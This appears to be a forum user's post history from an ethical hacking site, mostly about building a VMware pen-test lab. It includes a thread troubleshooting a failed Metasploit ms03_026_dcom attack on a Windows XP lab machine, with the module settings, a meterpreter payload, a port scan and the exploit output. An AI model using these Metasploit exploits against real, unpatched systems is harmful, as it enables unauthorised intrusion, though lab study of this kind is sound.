EH-Net
  Show Posts
286  Resources / Tutorials / Re: ms03_026_dcom help please on: May 29, 2012, 02:16:14 AM
Ok 3xban, if you're a Metasploit expert you can help me find my answers.
As you said, I downloaded Metasploitable. First, does this Linux-based OS have a GUI mode or not? Second, which vulnerabilities does it have, I mean which exploits can I run with it?

Thank you so much.
287  Resources / Tools / Re: Nmap 6 Released on: May 29, 2012, 02:09:17 AM
Thank you 3xban, that was a useful website. Now I have updated Nmap.
288  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: VMware Workstation Penetration Testing Lab on: May 29, 2012, 02:08:08 AM
you can use the Windows 2008 functional level, you only need to go mixed if you are running Domain controllers that are not 2008.  Going to the 2008 domain functional allows him to configure more of the advanced features available in 2008 domains. 

Then what if he wants to run an additional DC with W2K3? He can't do that if he selects Windows 2008 as the domain functional level. Besides, if he selects 2003 he can upgrade it to 2008 later.

So if you are using your BT system outside of the lab, you can create a route to point to the NIC IP you configured on your 2008 box that has access to the physical LAN.  On the 2008 box you will need to have RRAS configured so it can pass the traffic back and forth

RRAS??? As far as I know, the computer to which you want to add the RRAS role must have at least 2 interfaces which connect to 2 different networks, and as N_OP says he runs W2K8 on a VM. If you want to connect that BackTrack to the VM lab, the W2K8 must have direct access to it, so RRAS is useless in this case. Besides, he can set the VM adapter to NAT. With NAT the VM can connect to physical machines in the net. In this case the NAT adapter acts like a router, no RRAS required lol.

And if you want BackTrack to get an IP from the DHCP server, the router must support BOOTP because the BackTrack box cannot find DHCP from other subnets.



289  Resources / Tutorials / Re: ms03_026_dcom help please on: May 28, 2012, 08:24:08 AM
OK, thank you both. Yeah, I agree too, in third world countries you can find many unpatched OSes. And 3xban, I never say a machine is vulnerable until I get access to it, even if the port scanner says it's vulnerable. But some of the exploits in MSF are not designed for old machines, for example:

windows/browser/webdav_dll_hijacker

With this exploit you can get access to W2K8 R2 (if the admin is a fool lol).
290  Resources / Tutorials / Re: Metasploit help on: May 28, 2012, 02:32:17 AM
OK liliyke, if you think I need to update that, I'll test it today.
But I don't think it works.
291  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: VMware Workstation Penetration Testing Lab on: May 28, 2012, 02:06:52 AM
First, I think it's better to run that BackTrack on your VMware because maybe some of the tools can't work with another subnet. For example, if you have a Windows OS you can only use MBSA (Microsoft Baseline Security Analyzer) in your local subnet, so if you run BackTrack on a VM you can use the host-only adapter.

Second, it's just a technique, I have no references and I can't prove it, but whenever I want to configure VMware adapters (especially on version 7 or 7.1) I always delete all of the default adapters (first select them as host-only, then uncheck the "connect to a host virtual adapter" item), then I create new adapters with other numbers (don't forget to disable the DHCP item too).

If you want your VM to communicate with other physical machines you must set NAT on your card, but I think other physical machines can't get an IP from your DHCP server because NAT is something like a router and routers block broadcast packets.

Third, before you run the DC (domain controller), create a snapshot of your VMware machine status. It can be useful in failures or if you forget your password and so on. After you have configured your DC, do it again.

Fourth, set your domain functional level and forest functional level to Windows 2000, as you mentioned you have that machine in your lab.

292  Resources / Tutorials / Re: ms03_026_dcom help please on: May 27, 2012, 05:43:39 PM
Nobody! I know it's so easy to hack, but I want an MSF exploit like dcom which can execute code remotely, to hack Windows XP SP3.
293  Resources / Tutorials / Re: ms03_026_dcom help please on: May 27, 2012, 02:48:25 PM
Yes gromic,
your guess is absolutely true. So first, if it was patched in SP1-2 then why can we see Windows 2003 in the exploit target range?
Then I want to ask you something: what is your opinion about this video, serious?
294  Resources / Tutorials / Re: Hacking Scenarios on: May 27, 2012, 11:06:26 AM
WooooOOOOooooW

3xban, thanks, I think it's so great. I'll purchase it soon.
295  Resources / Tutorials / Re: ms03_026_dcom help please on: May 27, 2012, 03:21:52 AM
OK unicityd, so which SP of Windows XP do you think is vulnerable?
And which MSF exploit is compatible with Windows XP SP3?
296  Columns / Hadnagy / Re: [Article]-An Insider`s Look at the Social-Engineer.Org SE CtF at DEFCON on: May 27, 2012, 03:21:32 AM
Social engineering is great, and as the CEH presentation says, there is no patch for human stupidity!!!!! That was cool.
297  Resources / Tools / Re: Nmap 6 Released on: May 27, 2012, 03:16:14 AM
Yeah, the command line is great but Zenmap is easier for beginners. However, I'm using nmap, not Zenmap!
298  EH-Net / Greetings / Re: Hello people on: May 27, 2012, 03:10:34 AM
You're welcome techie, i hope more e so, and one more thing: your avatar is so cute, I like it.

Good Luck
299  Resources / Tutorials / Re: ms03_026_dcom help please on: May 26, 2012, 09:20:29 PM
The RHOST IP should be the victim machine's IP ie x.x.x.67. RHOST is remote host, not local.

Steve.

not if he is running a test on LAN. which seems he does.


SOOO sorry guys, I typed the IP addresses in the wrong places, so here is the correct info:

Attacker Machine: BackTrack 5 R2 Gnome
      IP Address: 192.168.137.67
Victim's Machine: Windows XP SP 3
      IP Address: 192.168.137.165

I modified the first post too so you can check it too.

I really don't know what my problem is, everything seems to be OK. Help me please.


300  Resources / Tutorials / ms03_026_dcom help please on: May 26, 2012, 03:33:54 PM
Hi guys, I started working in my new lab to learn Metasploit completely, so I used the ms03_026_dcom exploit to attack a Windows XP machine, but I can't get access. Does anybody know why? Here are the complete details:


ms03_026 vulnerability
=================================================
Lab setup:

Attacker Machine: BackTrack 5 R2 Gnome
      IP Address: 192.168.137.67
Victim's Machine: Windows XP SP 3
      IP Address: 192.168.137.165
=================================================
Victim's Portscan output:

PORT     STATE SERVICE
21/tcp   open  ftp
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
=================================================
Metasploit Framework 4.2

Exploit= windows/dcerpc/ms03_026_dcom
Payload= windows/meterpreter/bind_tcp

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.137.165  yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.137.165  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal
=================================================
Exploitation Process output

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.137.165[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
=================================================


Thanks

